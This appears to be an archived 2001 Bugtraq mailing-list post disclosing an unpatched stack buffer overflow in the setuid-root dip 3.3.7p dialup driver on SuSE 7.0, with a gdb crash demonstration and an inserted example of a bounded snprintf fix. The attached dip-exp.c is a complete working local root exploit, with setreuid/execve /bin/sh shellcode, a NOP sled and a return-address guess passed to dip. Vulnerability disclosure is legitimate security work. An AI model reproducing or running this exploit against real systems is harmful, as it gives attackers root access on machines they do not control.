6727597 2001-07-09 20:33 +0200  /54 lines/ sebi hegi <hegenbart@aon.at>
Sent by: joel@lysator.liu.se
Imported: 2001-07-10  02:25  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17871>
Subject: dip 3.3.7p-overflow
------------------------------------------------------------
Hi!  After doing a check on my SuSE Linux 7.0 x86 I found something
interesting:

hegi@faust:~ > ls -la /usr/sbin/dip
-rwsr-xr--   1 root     dialout     62056 Jul 29  2000 /usr/sbin/dip

DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.

I considered this a somewhat old version and did some searching and
found something on insecure.org as well as on securityfocus.com.

Description: Standard overflow (in the -l option processing).
Author: Goran Gajic <ggajic@AFRODITA.RCUB.BG.AC.YU>
Compromise: root (local)
Vulnerable Systems: Slackware Linux 3.4, presumably any other system using dip-3.3.7o or earlier suid root.
Date: 5 May 1998

Referring to a Bugtraq post from May 5, 1998, I did some research:

root@faust:/home/hegi > gdb /usr/sbin/dip
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...(no debugging symbols found)...
(gdb) run -k -l `perl -e 'print "a" x 130 '`
Starting program: /usr/sbin/dip -k -l `perl -e 'print "a" x 130 '`
DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.

DIP: cannot open /var/lock/LCK..aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Datei oder Verzeichnis nicht gefunden

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()

Looks like this version is still vulnerable although it went public
in 1998, according to securityfocus.com.

It's not world executable but still a security risk on SuSE 7.0. And
I'm wondering why at least SuSE still ships a product with a known
vulnerability.  I was told that Slackware 7.1 ships the same
version, which is vulnerable as well.

The vendor was contacted 3 years ago; it is still not patched.
(I wouldn't consider a sprintf so damn hard to patch.)

Have a nice day. 
Sebastian Hegenbart
(6727597) /sebi hegi <hegenbart@aon.at>/--(Reflowed)
Attachment (text/x-c) in text 6727598
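The fix the poster has in mind, as an added example that is neither dip's code nor part of the original post: the lock-file path from the gdb transcript built with a bounded snprintf and an explicit length check, with the overflowing sprintf shape left only as a comment. LOCK_PATH_MAX, build_lock_path and lock_path_accepts are constructed names and values (the post does not give dip's real buffer size), and the '/' check is general hygiene for a user-supplied path component, not a flaw the post reports.

```c
#include <stdio.h>
#include <string.h>

#define LOCK_PREFIX   "/var/lock/LCK.."  /* prefix seen in the gdb transcript */
#define LOCK_PATH_MAX 128                /* constructed size; dip's real size is not on the page */

/* Unsafe shape the post objects to (comment only, never compiled):
 *     char path[LOCK_PATH_MAX];
 *     sprintf(path, "%s%s", LOCK_PREFIX, name);
 * A 130-byte name runs off the end of path and overwrites the saved
 * return address, hence the SIGSEGV at 0x61616161 ("aaaa") above. */

/* Build "/var/lock/LCK..<name>" into out. Returns 0 on success, -1 if name
 * is empty, contains '/', or would not fit; out is then left empty so the
 * caller cannot act on a truncated path. */
int build_lock_path(char *out, size_t outlen, const char *name)
{
    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (name == NULL || name[0] == '\0' || strchr(name, '/') != NULL)
        return -1;
    int n = snprintf(out, outlen, "%s%s", LOCK_PREFIX, name);
    if (n < 0 || (size_t)n >= outlen) {  /* n >= outlen: snprintf truncated */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Boundary probe: is a name of namelen 'a' characters accepted (1) or refused (0)? */
int lock_path_accepts(size_t namelen)
{
    char out[LOCK_PATH_MAX], name[256];
    if (namelen >= sizeof name)
        return 0;
    memset(name, 'a', namelen);
    name[namelen] = '\0';
    return build_lock_path(out, sizeof out, name) == 0;
}

int main(void)
{
    char out[LOCK_PATH_MAX];
    if (build_lock_path(out, sizeof out, "ttyS0") == 0)
        printf("ttyS0:   %s\n", out);
    printf("130 a's: %s\n", lock_path_accepts(130) ? "accepted" : "refused");
    return 0;
}
```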
6727598 2001-07-09 20:33 +0200  /52 lines/ sebi hegi <hegenbart@aon.at>
Attachment filename: "dip-exp.c"
Imported: 2001-07-10  02:25  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17872>
Attachment (text/plain) to text 6727597
Subject: Attachment (dip-exp.c) to: dip 3.3.7p-overflow
------------------------------------------------------------
/* Linux x86 dip 3.3.7p exploit by pr10n */

#include <stdio.h>
#include <stdlib.h>     /* atoi, exit */
#include <string.h>     /* strlen, memcpy */
#include <unistd.h>     /* execl */

#define NOP 0x90
#define BUFLEN 136      /* length of the payload passed as the -l argument */

/* thanks to hack.co.za */
/* i386 Linux shellcode: setreuid(0,0), then execve("/bin/sh") */
char shellcode[] =
          "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
          "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
          "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
          "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

/* Current stack pointer (i386 only); base for the guessed return address. */
unsigned long get_sp(void)
{
    unsigned long sp;
    __asm__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

int main(int argc, char *argv[])
{
    char buf[BUFLEN + 1];   /* +1: the original wrote one byte past a 136-byte buffer */
    int i;
    int offset = 0;
    long ret;

    if (argc != 2) {
        printf("usage: %s offset\n", argv[0]);
        exit(0);
    }

    offset = atoi(argv[1]);
    ret = get_sp() - offset;

    /* Fill the buffer with copies of the guessed return address; starting at
       byte 1 keeps the original's alignment, and the last copy ends in the
       extra byte. */
    for (i = 1; i < BUFLEN; i += 4)
        *(long *)&buf[i] = ret;

    printf("\nusing: 0x%lx\n\n", ret);

    /* Layout: NOP sled, then the shellcode, then the return-address copies. */
    for (i = 0; i < (int)(BUFLEN - strlen(shellcode) - 40); i++)
        buf[i] = NOP;
    memcpy(buf + i, shellcode, strlen(shellcode));
    buf[BUFLEN] = '\0';     /* terminate the argument; the original relied on whatever byte followed buf */

    execl("/usr/sbin/dip", "dip", "-k", "-l", buf, (char *)0);
    perror("execl");        /* only reached if dip could not be started */
    return 1;
}
(6727598) /sebi hegi <hegenbart@aon.at>/------------